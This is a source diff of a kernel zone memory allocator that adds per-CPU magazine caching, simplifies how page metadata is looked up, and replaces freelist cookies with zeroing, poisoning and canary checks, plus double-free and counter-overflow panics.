+ * + * The zone caching layer has been designed to avoid returning elements in + * a strict LIFO behavior: @c zalloc() will allocate from the (a) magazine, + * and @c zfree() free to the (f) magazine, and only swap them when the + * requested operation cannot be fulfilled. + * + * The per-cpu overflow depot or the recirculation depots are similarly used + * in FIFO order. + * + * More importantly, when magazines flow through the recirculation depot, + * the elements they contain are marked as "free" in the zone layer bitmaps. + * Because allocations out of per-cpu caches verify the bitmaps at allocation + * time, this acts as a poor man's double-free quarantine. The magazines + * allow to avoid the cost of the bit-scanning involved in the zone-level + * @c zalloc_item() codepath. + * + * + * @field zc_alloc_cur denormalized number of elements in the (a) magazine + * @field zc_free_cur denormalized number of elements in the (f) magazine + * @field zc_alloc_elems a pointer to the array of elements in (a) + * @field zc_free_elems a pointer to the array of elements in (f) + * + * @field zc_depot_lock a lock to access @c zc_depot, @c zc_depot_cur. + * @field zc_depot a list of @c zc_depot_cur full magazines + * @field zc_depot_cur number of magazines in @c zc_depot + * @field zc_depot_max the maximum number of elements in @c zc_depot, + * protected by the zone lock. 
+ */ +typedef struct zone_cache { + uint16_t zc_alloc_cur; + uint16_t zc_free_cur; + uint16_t zc_depot_cur; + uint16_t __zc_padding; + zone_element_t *zc_alloc_elems; + zone_element_t *zc_free_elems; + hw_lock_bit_t zc_depot_lock; + uint32_t zc_depot_max; + struct zone_depot zc_depot; +} *zone_cache_t; static __security_const_late struct { - struct zone_map_range zi_map_range; - struct zone_map_range zi_general_range; - struct zone_map_range zi_meta_range; - struct zone_map_range zi_foreign_range; + struct zone_map_range zi_map_range[ZONE_ADDR_KIND_COUNT]; + struct zone_map_range zi_meta_range; /* debugging only */ + struct zone_map_range zi_bits_range; /* bits buddy allocator */ /* * The metadata lives within the zi_meta_range address range. * * The correct formula to find a metadata index is: - * absolute_page_index - page_index(zi_meta_range.min_address) + * absolute_page_index - page_index(MIN(zi_map_range[*].min_address)) * * And then this index is used to dereference zi_meta_range.min_address * as a `struct zone_page_metadata` array. * * To avoid doing that substraction all the time in the various fast-paths, - * zi_array_base is offset by `page_index(zi_meta_range.min_address)` - * to avoid redoing that math all the time. + * zi_meta_base are pre-offset with that minimum page index to avoid redoing + * that math all the time. + * + * Do note that the array might have a hole punched in the middle, + * see zone_metadata_init(). */ - struct zone_page_metadata *zi_array_base; + struct zone_page_metadata *zi_meta_base; } zone_info; +/* + * Initial array of metadata for stolen memory. + * + * The numbers here have to be kept in sync with vm_map_steal_memory() + * so that we have reserved enough metadata. + * + * After zone_init() has run (which happens while the kernel is still single + * threaded), the metadata is moved to its final dynamic location, and + * this array is unmapped with the rest of __startup_data at lockdown. 
+ */ +#if CONFIG_GZALLOC +#define ZONE_FOREIGN_META_INLINE_COUNT 20032 +#else +#define ZONE_FOREIGN_META_INLINE_COUNT 64 +#endif +__startup_data +static struct zone_page_metadata + zone_foreign_meta_array_startup[ZONE_FOREIGN_META_INLINE_COUNT]; + /* * The zone_locks_grp allows for collecting lock statistics. * All locks are associated to this group in zinit. * Look at tools/lockstat for debugging lock contention. */ -LCK_GRP_DECLARE(zone_locks_grp, "zone_locks"); -LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp); +static LCK_GRP_DECLARE(zone_locks_grp, "zone_locks"); +static LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp); /* * Exclude more than one concurrent garbage collection */ -LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc"); -LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp); +static LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc"); +static LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp); -boolean_t panic_include_zprint = FALSE; +bool panic_include_zprint = FALSE; mach_memory_info_t *panic_kext_memory_info = NULL; vm_size_t panic_kext_memory_size = 0; @@ -253,8 +431,8 @@ vm_size_t panic_kext_memory_size = 0; * zone_destroyed_bitmap */ static SIMPLE_LOCK_DECLARE(all_zones_lock, 0); -static unsigned int num_zones_in_use; -unsigned int _Atomic num_zones; +static zone_id_t num_zones_in_use; +zone_id_t _Atomic num_zones; SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count; #if KASAN_ZALLOC @@ -262,7 +440,28 @@ SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count; #else /* !KASAN_ZALLOC */ #define MAX_ZONES 402 #endif/* !KASAN_ZALLOC */ -struct zone zone_array[MAX_ZONES]; + +/* + * Initial globals for zone stats until we can allocate the real ones. + * Those get migrated inside the per-CPU ones during zone_init() and + * this array is unmapped with the rest of __startup_data at lockdown. 
+ */ + +/* zone to allocate zone_magazine structs from */ +static SECURITY_READ_ONLY_LATE(zone_t) zc_magazine_zone; +/* + * Until pid1 is made, zone caching is off, + * until compute_zone_working_set_size() runs for the firt time. + * + * -1 represents the "never enabled yet" value. + */ +static int8_t zone_caching_disabled = -1; + +__startup_data +static struct zone_cache zone_cache_startup[MAX_ZONES]; +__startup_data +static struct zone_stats zone_stats_startup[MAX_ZONES]; +struct zone zone_array[MAX_ZONES]; /* Initialized in zone_bootstrap(), how many "copies" the per-cpu system does */ static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count; @@ -270,9 +469,6 @@ static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count; /* Used to keep track of destroyed slots in the zone_array */ static bitmap_t zone_destroyed_bitmap[BITMAP_LEN(MAX_ZONES)]; -/* number of pages used by all zones */ -static long _Atomic zones_phys_page_count; - /* number of zone mapped pages used by all zones */ static long _Atomic zones_phys_page_mapped_count; @@ -298,70 +494,56 @@ TUNABLE(zone_security_options_t, zsecurity_options, "zs", ZSECURITY_DEFAULT); #if VM_MAX_TAG_ZONES /* enable tags for zones that ask for it */ -TUNABLE(bool, zone_tagging_on, "-zt", false); +static TUNABLE(bool, zone_tagging_on, "-zt", false); #endif /* VM_MAX_TAG_ZONES */ #if DEBUG || DEVELOPMENT TUNABLE(bool, zalloc_disable_copyio_check, "-no-copyio-zalloc-check", false); -__options_decl(zalloc_debug_t, uint32_t, { - ZALLOC_DEBUG_ZONEGC = 0x00000001, - ZALLOC_DEBUG_ZCRAM = 0x00000002, -}); - -TUNABLE(zalloc_debug_t, zalloc_debug, "zalloc_debug", 0); #endif /* DEBUG || DEVELOPMENT */ #if CONFIG_ZLEAKS /* Making pointer scanning leaks detection possible for all zones */ -TUNABLE(bool, zone_leaks_scan_enable, "-zl", false); +static TUNABLE(bool, zone_leaks_scan_enable, "-zl", false); #else #define zone_leaks_scan_enable false #endif -/* - * Async allocation of zones - * This mechanism allows for bootstrapping 
an empty zone which is setup with - * non-blocking flags. The first call to zalloc_noblock() will kick off a thread_call - * to zalloc_async. We perform a zalloc() (which may block) and then an immediate free. - * This will prime the zone for the next use. - * - * Currently the thread_callout function (zalloc_async) will loop through all zones - * looking for any zone with async_pending set and do the work for it. +/*! @enum zprot_mode_t * - * NOTE: If the calling thread for zalloc_noblock is lower priority than thread_call, - * then zalloc_noblock to an empty zone may succeed. - */ -static void zalloc_async(thread_call_param_t p0, thread_call_param_t p1); -static thread_call_data_t call_async_alloc; -static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size); - -/* - * Zone Corruption Debugging + * @brief + * Zone element corruption detection mode. * + * @discussion * We use four techniques to detect modification of a zone element * after it's been freed. * - * (1) Check the freelist next pointer for sanity. - * (2) Store a backup of the next pointer at the end of the element, - * and compare it to the primary next pointer when the element is allocated - * to detect corruption of the freelist due to use-after-free bugs. - * The backup pointer is also XORed with a per-boot random cookie. - * (3) Poison the freed element by overwriting it with 0xdeadbeef, - * and check for that value when the element is being reused to make sure - * no part of the element has been modified while it was on the freelist. - * This will also help catch read-after-frees, as code will now dereference - * 0xdeadbeef instead of a valid but freed pointer. - * (4) If the zfree_clear_mem flag is set clear the element on free and - * assert that it is still clear when alloc-ed. - * - * (1) and (2) occur for every allocation and free to a zone. - * This is done to make it slightly more difficult for an attacker to - * manipulate the freelist to behave in a specific way. 
- * - * Poisoning (3) occurs periodically for every N frees (counted per-zone). + * Elements that are in zones can be in 3 possible states: + * - zeroed out (@c ZPM_ZERO) + * - poisoned (@c ZPM_POISON) with the @c ZONE_POISON pattern + * - with a left and right canary (@c ZPM_CANARY). + * + * @c ZPM_AUTO is used when the actual protection for the element is unknown, + * and will be detected looking at the last word of the allocation at validation + * time. + * + * The mode of an element in zones is discovered by looking at its last + * pointer-sized value: + * - 0 means that it is zeroed out + * - @c ZONE_POISON means it is poisoned + * - any other value means it is using canaries. + * + * Elements are zeroed if: + * - the element size is smaller than @c zp_min_size, + * - the owning zone has the @c z_free_zeroes flag set, + * - the chunk backing store is fresh (and was just allocated). + * + * Elements are poisoned periodically for every N frees (counted per-zone), + * if the elements aren't otherwise zeroed out. * If -zp is passed as a boot arg, poisoning occurs for every free. * - * Zeroing (4) is done for those zones that pass the ZC_ZFREE_CLEARMEM - * flag on creation or if the element size is less than one cacheline. + * Else elements use canaries. When canaries are used, the first and last + * pointer sized values in the allocation are set to values derived from the + * element address and the @c zp_canary nonce. The first @c zp_min_size + * bytes of the elment are also cleared. * * Performance slowdown is inversely proportional to the frequency of poisoning, * with a 4-5% hit around N=1, down to ~0.3% at N=16 and just "noise" at N=32 @@ -372,23 +554,15 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size); * * For a more heavyweight, but finer-grained method of detecting misuse * of zone memory, look up the "Guard mode" zone allocator in gzalloc.c. 
- * - * Zone Corruption Logging - * - * You can also track where corruptions come from by using the boot-arguments - * "zlog= -zc". Search for "Zone corruption logging" later - * in this document for more implementation and usage information. - * - * Zone Leak Detection - * - * To debug leaks of zone memory, use the zone leak detection tool 'zleaks' - * found later in this file via the showtopztrace and showz* macros in kgmacros, - * or use zlog without the -zc argument. - * */ +__enum_closed_decl(zprot_mode_t, vm_offset_t, { + ZPM_AUTO, /* element is indeterminate */ + ZPM_ZERO, /* element is zeroed */ + ZPM_POISON, /* element is poisoned */ + ZPM_CANARY, /* element extremities have a canary */ +}); +#define ZPM_MASK ((zprot_mode_t)0x3) -#define ZP_DEFAULT_SAMPLING_FACTOR 16 -#define ZP_DEFAULT_SCALE_FACTOR 4 /* * set by zp-factor=N boot arg @@ -399,57 +573,63 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size); * A zp_factor of 1 indicates zone poisoning is on for all elements and can be * set by passing the -zp boot-arg. 
*/ -static TUNABLE(uint32_t, zp_factor, "zp-factor", ZP_DEFAULT_SAMPLING_FACTOR); +static TUNABLE(uint32_t, zp_factor, "zp-factor", 16); /* set by zp-scale=N boot arg, scales zp_factor by zone size */ -static TUNABLE(uint32_t, zp_scale, "zp-scale", ZP_DEFAULT_SCALE_FACTOR); - -/* initialized to a per-boot random value in zp_bootstrap */ -static SECURITY_READ_ONLY_LATE(uintptr_t) zp_poisoned_cookie; -static SECURITY_READ_ONLY_LATE(uintptr_t) zp_nopoison_cookie; -static SECURITY_READ_ONLY_LATE(uintptr_t) zp_min_size; -static SECURITY_READ_ONLY_LATE(uint64_t) zone_phys_mapped_max; - -static SECURITY_READ_ONLY_LATE(vm_map_t) zone_submaps[Z_SUBMAP_IDX_COUNT]; -static SECURITY_READ_ONLY_LATE(uint32_t) zone_last_submap_idx; +static TUNABLE(uint32_t, zp_scale, "zp-scale", 4); -static struct bool_gen zone_bool_gen; -static zone_t zone_find_largest(void); -static void zone_drop_free_elements(zone_t z); - -#define submap_for_zone(z) zone_submaps[(z)->submap_idx] -#define MAX_SUBMAP_NAME 16 - -/* Globals for random boolean generator for elements in free list */ -#define MAX_ENTROPY_PER_ZCRAM 4 - -#if CONFIG_ZCACHE /* - * Specifies a single zone to enable CPU caching for. - * Can be set using boot-args: zcc_enable_for_zone_name= + * Zone caching tunables + * + * zc_mag_size(): + * size of magazines, larger to reduce contention at the expense of memory + * + * zc_auto_enable_threshold + * number of contentions per second after which zone caching engages + * automatically. + * + * 0 to disable. + * + * zc_grow_threshold + * numer of contentions per second after which the per-cpu depot layer + * grows at each newly observed contention without restriction. + * + * 0 to disable. + * + * zc_recirc_denom + * denominator of the fraction of per-cpu depot to migrate to/from + * the recirculation depot layer at a time. Default 3 (1/3). + * + * zc_defrag_ratio + * percentage of the working set to recirc size below which + * the zone is defragmented. Default is 50%. 
+ * + * zc_free_batch_size + * The size of batches of frees/reclaim that can be done keeping + * the zone lock held (and preemption disabled). + */ +static TUNABLE(uint16_t, zc_magazine_size, "zc_mag_size()", 8); +static TUNABLE(uint32_t, zc_auto_threshold, "zc_auto_enable_threshold", 20); +static TUNABLE(uint32_t, zc_grow_threshold, "zc_grow_threshold", 8); +static TUNABLE(uint32_t, zc_recirc_denom, "zc_recirc_denom", 3); +static TUNABLE(uint32_t, zc_defrag_ratio, "zc_defrag_ratio", 50); +static TUNABLE(uint32_t, zc_free_batch_size, "zc_free_batch_size", 1024); + +static SECURITY_READ_ONLY_LATE(uintptr_t) zp_canary; +/* + * Perf results for zeroing all non data zones and 2K of data zones + * showed little regression, therefore setting zp_min_size to 2048 */ -static char cache_zone_name[MAX_ZONE_NAME]; -static TUNABLE(bool, zcc_kalloc, "zcc_kalloc", false); +static TUNABLE(uint32_t, zp_min_size, "zclear_size", 2048); +static SECURITY_READ_ONLY_LATE(uint32_t) zone_phys_mapped_max_pages; +static SECURITY_READ_ONLY_LATE(vm_map_t) zone_submaps[Z_SUBMAP_IDX_COUNT]; +static SECURITY_READ_ONLY_LATE(uint32_t) zone_last_submap_idx; -__header_always_inline bool -zone_caching_enabled(zone_t z) -{ - return z->zcache.zcc_depot != NULL; -} -#else -__header_always_inline bool -zone_caching_enabled(zone_t z __unused) -{ - return false; -} -#endif /* CONFIG_ZCACHE */ +static zone_t zone_find_largest(void); +#endif /* !ZALLOC_TEST */ #pragma mark Zone metadata - -__enum_closed_decl(zone_addr_kind_t, bool, { - ZONE_ADDR_NATIVE, - ZONE_ADDR_FOREIGN, -}); +#if !ZALLOC_TEST static inline zone_id_t zone_index(zone_t z) @@ -463,18 +643,36 @@ zone_has_index(zone_t z, zone_id_t zid) return zone_array + zid == z; } -static inline vm_size_t -zone_elem_count(zone_t zone, vm_size_t alloc_size, zone_addr_kind_t kind) +static zone_element_t +zone_element_encode(vm_offset_t base, vm_offset_t eidx, zprot_mode_t zpm) { - if (kind == ZONE_ADDR_NATIVE) { - if (zone->percpu) { - return PAGE_SIZE / 
zone_elem_size(zone); - } - return alloc_size / zone_elem_size(zone); - } else { - assert(alloc_size == PAGE_SIZE); - return (PAGE_SIZE - ZONE_PAGE_FIRST_OFFSET(kind)) / zone_elem_size(zone); - } + return (zone_element_t){ .ze_value = base | (eidx << 2) | zpm }; +} + +static vm_offset_t +zone_element_base(zone_element_t ze) +{ + return trunc_page(ze.ze_value); +} + +static vm_offset_t +zone_element_idx(zone_element_t ze) +{ + return (ze.ze_value & PAGE_MASK) >> 2; +} + +#if ZALLOC_ENABLE_POISONING +static zprot_mode_t +zone_element_prot(zone_element_t ze) +{ + return (zprot_mode_t)(ze.ze_value & ZPM_MASK); +} +#endif + +static vm_offset_t +zone_element_addr(zone_element_t ze, vm_offset_t esize) +{ + return zone_element_base(ze) + esize * zone_element_idx(ze); } __abortlike @@ -494,6 +692,15 @@ zone_invalid_element_addr_panic(zone_t zone, vm_offset_t addr) (void *)addr, zone_heap_name(zone), zone->z_name); } +__abortlike +static void +zone_invalid_element_panic(zone_t zone, zone_element_t ze) +{ + panic("zone element pointer validation failed (elem: %p,%d, zone %s%s)", + (void *)zone_element_base(ze), (int)zone_element_idx(ze), + zone_heap_name(zone), zone->z_name); +} + __abortlike static void zone_page_metadata_index_confusion_panic(zone_t zone, vm_offset_t addr, @@ -521,22 +728,6 @@ zone_page_metadata_list_corruption(zone_t zone, struct zone_page_metadata *meta) meta, zone_heap_name(zone), zone->z_name); } -__abortlike -static void -zone_page_metadata_foreign_queue_corruption(zone_t zone, zone_pva_t *queue) -{ - panic("native metadata index %d enqueued in foreign head %p from zone %s%s", - queue->packed_address, queue, zone_heap_name(zone), zone->z_name); -} - -__abortlike -static void -zone_page_metadata_foreign_confusion_panic(zone_t zone, vm_offset_t addr) -{ - panic("manipulating foreign address %p in a native-only zone %s%s", - (void *)addr, zone_heap_name(zone), zone->z_name); -} - __abortlike __unused static void zone_invalid_foreign_addr_panic(zone_t 
zone, vm_offset_t addr) @@ -554,6 +745,15 @@ zone_page_meta_accounting_panic(zone_t zone, struct zone_page_metadata *meta, zone_heap_name(zone), zone->z_name, meta); } +__abortlike +static void +zone_meta_double_free_panic(zone_t zone, zone_element_t ze, const char *caller) +{ + panic("%s: double free of %p to zone %s%s", caller, + (void *)zone_element_addr(ze, zone_elem_size(zone)), + zone_heap_name(zone), zone->z_name); +} + __abortlike static void zone_accounting_panic(zone_t zone, const char *kind) @@ -562,6 +762,52 @@ zone_accounting_panic(zone_t zone, const char *kind) zone_heap_name(zone), zone->z_name); } +#define zone_counter_sub(z, stat, value) ({ \ + if (os_sub_overflow((z)->stat, value, &(z)->stat)) { \ + zone_accounting_panic(z, #stat " wrap-around"); \ + } \ + (z)->stat; \ +}) + +static inline void +zone_elems_free_add(zone_t z, uint32_t count) +{ + uint32_t n = (z->z_elems_free += count); + if (z->z_elems_free_max < n) { + z->z_elems_free_max = n; + } +} + +static inline void +zone_elems_free_sub(zone_t z, uint32_t count) +{ + uint32_t n = zone_counter_sub(z, z_elems_free, count); + + if (z->z_elems_free_min > n) { + z->z_elems_free_min = n; + } +} + +static inline uint16_t +zone_meta_alloc_size_add(zone_t z, struct zone_page_metadata *m, + vm_offset_t esize) +{ + if (os_add_overflow(m->zm_alloc_size, (uint16_t)esize, &m->zm_alloc_size)) { + zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around"); + } + return m->zm_alloc_size; +} + +static inline uint16_t +zone_meta_alloc_size_sub(zone_t z, struct zone_page_metadata *m, + vm_offset_t esize) +{ + if (os_sub_overflow(m->zm_alloc_size, esize, &m->zm_alloc_size)) { + zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around"); + } + return m->zm_alloc_size; +} + __abortlike static void zone_nofail_panic(zone_t zone) @@ -603,21 +849,15 @@ zone_range_size(const struct zone_map_range *r) return rmax - rmin; } -#define from_zone_map(addr, size) \ - zone_range_contains(&zone_info.zi_map_range, 
(vm_offset_t)(addr), size) - -#define from_general_submap(addr, size) \ - zone_range_contains(&zone_info.zi_general_range, (vm_offset_t)(addr), size) +#define from_zone_map(addr, size, kind) \ + zone_range_contains(&zone_info.zi_map_range[kind], \ + (vm_offset_t)(addr), size) -#define from_foreign_range(addr, size) \ - zone_range_contains(&zone_info.zi_foreign_range, (vm_offset_t)(addr), size) +#define zone_native_size() \ + zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_NATIVE]) -#define from_native_meta_map(addr) \ - zone_range_contains(&zone_info.zi_meta_range, (vm_offset_t)(addr), \ - sizeof(struct zone_page_metadata)) - -#define zone_addr_kind(addr, size) \ - (from_zone_map(addr, size) ? ZONE_ADDR_NATIVE : ZONE_ADDR_FOREIGN) +#define zone_foreign_size() \ + zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_FOREIGN]) __header_always_inline bool zone_pva_is_null(zone_pva_t page) @@ -663,6 +903,12 @@ zone_pva_from_addr(vm_address_t addr) return (zone_pva_t){ (uint32_t)((intptr_t)addr >> PAGE_SHIFT) }; } +__header_always_inline zone_pva_t +zone_pva_from_element(zone_element_t ze) +{ + return zone_pva_from_addr(ze.ze_value); +} + __header_always_inline vm_address_t zone_pva_to_addr(zone_pva_t page) { @@ -671,52 +917,44 @@ zone_pva_to_addr(zone_pva_t page) } __header_always_inline struct zone_page_metadata * -zone_pva_to_meta(zone_pva_t page, zone_addr_kind_t kind) +zone_pva_to_meta(zone_pva_t page) { - if (kind == ZONE_ADDR_NATIVE) { - return &zone_info.zi_array_base[page.packed_address]; - } else { - return (struct zone_page_metadata *)zone_pva_to_addr(page); - } + return &zone_info.zi_meta_base[page.packed_address]; } __header_always_inline zone_pva_t -zone_pva_from_meta(struct zone_page_metadata *meta, zone_addr_kind_t kind) +zone_pva_from_meta(struct zone_page_metadata *meta) { - if (kind == ZONE_ADDR_NATIVE) { - uint32_t index = (uint32_t)(meta - zone_info.zi_array_base); - return (zone_pva_t){ index }; - } else { - return 
zone_pva_from_addr((vm_address_t)meta); - } + return (zone_pva_t){ (uint32_t)(meta - zone_info.zi_meta_base) }; } __header_always_inline struct zone_page_metadata * -zone_meta_from_addr(vm_offset_t addr, zone_addr_kind_t kind) +zone_meta_from_addr(vm_offset_t addr) { - if (kind == ZONE_ADDR_NATIVE) { - return zone_pva_to_meta(zone_pva_from_addr(addr), kind); - } else { - return (struct zone_page_metadata *)trunc_page(addr); - } + return zone_pva_to_meta(zone_pva_from_addr(addr)); +} + +__header_always_inline struct zone_page_metadata * +zone_meta_from_element(zone_element_t ze) +{ + return zone_pva_to_meta(zone_pva_from_element(ze)); } -#define zone_native_meta_from_addr(addr) \ - zone_meta_from_addr((vm_offset_t)(addr), ZONE_ADDR_NATIVE) +__header_always_inline zone_id_t +zone_index_from_ptr(const void *ptr) +{ + return zone_pva_to_meta(zone_pva_from_addr((vm_offset_t)ptr))->zm_index; +} __header_always_inline vm_offset_t -zone_meta_to_addr(struct zone_page_metadata *meta, zone_addr_kind_t kind) +zone_meta_to_addr(struct zone_page_metadata *meta) { - if (kind == ZONE_ADDR_NATIVE) { - return ptoa((int)(meta - zone_info.zi_array_base)); - } else { - return (vm_offset_t)meta; - } + return ptoa((int32_t)(meta - zone_info.zi_meta_base)); } __header_always_inline void zone_meta_queue_push(zone_t z, zone_pva_t *headp, - struct zone_page_metadata *meta, zone_addr_kind_t kind) + struct zone_page_metadata *meta) { zone_pva_t head = *headp; zone_pva_t queue_pva = zone_queue_encode(headp); @@ -724,34 +962,30 @@ zone_meta_queue_push(zone_t z, zone_pva_t *headp, meta->zm_page_next = head; if (!zone_pva_is_null(head)) { - tmp = zone_pva_to_meta(head, kind); + tmp = zone_pva_to_meta(head); if (!zone_pva_is_equal(tmp->zm_page_prev, queue_pva)) { zone_page_metadata_list_corruption(z, meta); } - tmp->zm_page_prev = zone_pva_from_meta(meta, kind); + tmp->zm_page_prev = zone_pva_from_meta(meta); } meta->zm_page_prev = queue_pva; - *headp = zone_pva_from_meta(meta, kind); + *headp = 
zone_pva_from_meta(meta); } __header_always_inline struct zone_page_metadata * -zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind, - vm_offset_t *page_addrp) +zone_meta_queue_pop_native(zone_t z, zone_pva_t *headp, vm_offset_t *page_addrp) { zone_pva_t head = *headp; - struct zone_page_metadata *meta = zone_pva_to_meta(head, kind); + struct zone_page_metadata *meta = zone_pva_to_meta(head); vm_offset_t page_addr = zone_pva_to_addr(head); struct zone_page_metadata *tmp; - if (kind == ZONE_ADDR_NATIVE && !from_native_meta_map(meta)) { + if (!from_zone_map(page_addr, 1, ZONE_ADDR_NATIVE)) { zone_page_metadata_native_queue_corruption(z, headp); } - if (kind == ZONE_ADDR_FOREIGN && from_zone_map(meta, sizeof(*meta))) { - zone_page_metadata_foreign_queue_corruption(z, headp); - } if (!zone_pva_is_null(meta->zm_page_next)) { - tmp = zone_pva_to_meta(meta->zm_page_next, kind); + tmp = zone_pva_to_meta(meta->zm_page_next); if (!zone_pva_is_equal(tmp->zm_page_prev, head)) { zone_page_metadata_list_corruption(z, meta); } @@ -759,19 +993,24 @@ zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind, } *headp = meta->zm_page_next; + meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 }; *page_addrp = page_addr; + + if (!zone_has_index(z, meta->zm_index)) { + zone_page_metadata_index_confusion_panic(z, + zone_meta_to_addr(meta), meta); + } return meta; } __header_always_inline void -zone_meta_requeue(zone_t z, zone_pva_t *headp, - struct zone_page_metadata *meta, zone_addr_kind_t kind) +zone_meta_remqueue(zone_t z, struct zone_page_metadata *meta) { - zone_pva_t meta_pva = zone_pva_from_meta(meta, kind); + zone_pva_t meta_pva = zone_pva_from_meta(meta); struct zone_page_metadata *tmp; if (!zone_pva_is_null(meta->zm_page_next)) { - tmp = zone_pva_to_meta(meta->zm_page_next, kind); + tmp = zone_pva_to_meta(meta->zm_page_next); if (!zone_pva_is_equal(tmp->zm_page_prev, meta_pva)) { zone_page_metadata_list_corruption(z, meta); } @@ -780,14 
+1019,48 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp, if (zone_pva_is_queue(meta->zm_page_prev)) { zone_queue_set_head(z, meta->zm_page_prev, meta_pva, meta); } else { - tmp = zone_pva_to_meta(meta->zm_page_prev, kind); + tmp = zone_pva_to_meta(meta->zm_page_prev); if (!zone_pva_is_equal(tmp->zm_page_next, meta_pva)) { zone_page_metadata_list_corruption(z, meta); } tmp->zm_page_next = meta->zm_page_next; } - zone_meta_queue_push(z, headp, meta, kind); + meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 }; +} + +__header_always_inline void +zone_meta_requeue(zone_t z, zone_pva_t *headp, + struct zone_page_metadata *meta) +{ + zone_meta_remqueue(z, meta); + zone_meta_queue_push(z, headp, meta); +} + +/* prevents a given metadata from ever reaching the z_pageq_empty queue */ +static inline void +zone_meta_lock_in_partial(zone_t z, struct zone_page_metadata *m, uint32_t len) +{ + uint16_t new_size = zone_meta_alloc_size_add(z, m, ZM_ALLOC_SIZE_LOCK); + + assert(new_size % sizeof(vm_offset_t) == ZM_ALLOC_SIZE_LOCK); + if (new_size == ZM_ALLOC_SIZE_LOCK) { + zone_meta_requeue(z, &z->z_pageq_partial, m); + zone_counter_sub(z, z_wired_empty, len); + } +} + +/* allows a given metadata to reach the z_pageq_empty queue again */ +static inline void +zone_meta_unlock_from_partial(zone_t z, struct zone_page_metadata *m, uint32_t len) +{ + uint16_t new_size = zone_meta_alloc_size_sub(z, m, ZM_ALLOC_SIZE_LOCK); + + assert(new_size % sizeof(vm_offset_t) == 0); + if (new_size == 0) { + zone_meta_requeue(z, &z->z_pageq_empty, m); + z->z_wired_empty += len; + } } /* @@ -795,8 +1068,10 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp, * Must be called without the zone lock held as it might potentially block. 
*/ static void -zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *to) +zone_meta_populate(vm_offset_t base, vm_size_t size) { + struct zone_page_metadata *from = zone_meta_from_addr(base); + struct zone_page_metadata *to = from + atop(size); vm_offset_t page_addr = trunc_page(from); for (; page_addr < (vm_offset_t)to; page_addr += PAGE_SIZE) { @@ -838,54 +1113,59 @@ zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *t } } -static inline bool -zone_allocated_element_offset_is_valid(zone_t zone, vm_offset_t addr, - vm_offset_t page, zone_addr_kind_t kind) +__header_always_inline +struct zone_page_metadata * +zone_element_validate(zone_t zone, zone_element_t ze) { - vm_offset_t offs = addr - page - ZONE_PAGE_FIRST_OFFSET(kind); - vm_offset_t esize = zone_elem_size(zone); + struct zone_page_metadata *meta; + vm_offset_t page = zone_element_base(ze); - if (esize & (esize - 1)) { /* not a power of 2 */ - return (offs % esize) == 0; - } else { - return (offs & (esize - 1)) == 0; + if (!from_zone_map(page, 1, ZONE_ADDR_NATIVE) && + !from_zone_map(page, 1, ZONE_ADDR_FOREIGN)) { + zone_invalid_element_panic(zone, ze); + } + meta = zone_meta_from_addr(page); + + if (meta->zm_chunk_len > ZM_CHUNK_LEN_MAX) { + zone_invalid_element_panic(zone, ze); + } + if (zone_element_idx(ze) >= zone->z_chunk_elems) { + zone_invalid_element_panic(zone, ze); + } + + if (!zone_has_index(zone, meta->zm_index)) { + vm_offset_t addr = zone_element_addr(ze, zone_elem_size(zone)); + zone_page_metadata_index_confusion_panic(zone, addr, meta); } + + return meta; } __attribute__((always_inline)) static struct zone_page_metadata * -zone_allocated_element_resolve(zone_t zone, vm_offset_t addr, - vm_offset_t *pagep, zone_addr_kind_t *kindp) +zone_element_resolve(zone_t zone, vm_offset_t addr, vm_offset_t esize, + zone_element_t *ze) { struct zone_page_metadata *meta; - zone_addr_kind_t kind; - vm_offset_t page; - vm_offset_t esize = 
zone_elem_size(zone); + vm_offset_t page, eidx; - kind = zone_addr_kind(addr, esize); + if (!from_zone_map(addr, esize, ZONE_ADDR_NATIVE) && + !from_zone_map(addr, esize, ZONE_ADDR_FOREIGN)) { + zone_invalid_element_addr_panic(zone, addr); + } page = trunc_page(addr); - meta = zone_meta_from_addr(addr, kind); + meta = zone_meta_from_addr(addr); - if (kind == ZONE_ADDR_NATIVE) { - if (meta->zm_secondary_page) { - if (meta->zm_percpu) { - zone_invalid_element_addr_panic(zone, addr); - } - page -= ptoa(meta->zm_page_count); - meta -= meta->zm_page_count; - } - } else if (!zone->allows_foreign) { - zone_page_metadata_foreign_confusion_panic(zone, addr); -#if __LP64__ - } else if (!from_foreign_range(addr, esize)) { - zone_invalid_foreign_addr_panic(zone, addr); -#else - } else if (!pmap_kernel_va(addr)) { + if (meta->zm_chunk_len == ZM_SECONDARY_PCPU_PAGE) { zone_invalid_element_addr_panic(zone, addr); -#endif + } + if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) { + page -= ptoa(meta->zm_page_index); + meta -= meta->zm_page_index; } - if (!zone_allocated_element_offset_is_valid(zone, addr, page, kind)) { + eidx = (addr - page) / esize; + if ((addr - page) % esize) { zone_invalid_element_addr_panic(zone, addr); } @@ -893,86 +1173,27 @@ zone_allocated_element_resolve(zone_t zone, vm_offset_t addr, zone_page_metadata_index_confusion_panic(zone, addr, meta); } - if (kindp) { - *kindp = kind; - } - if (pagep) { - *pagep = page; - } 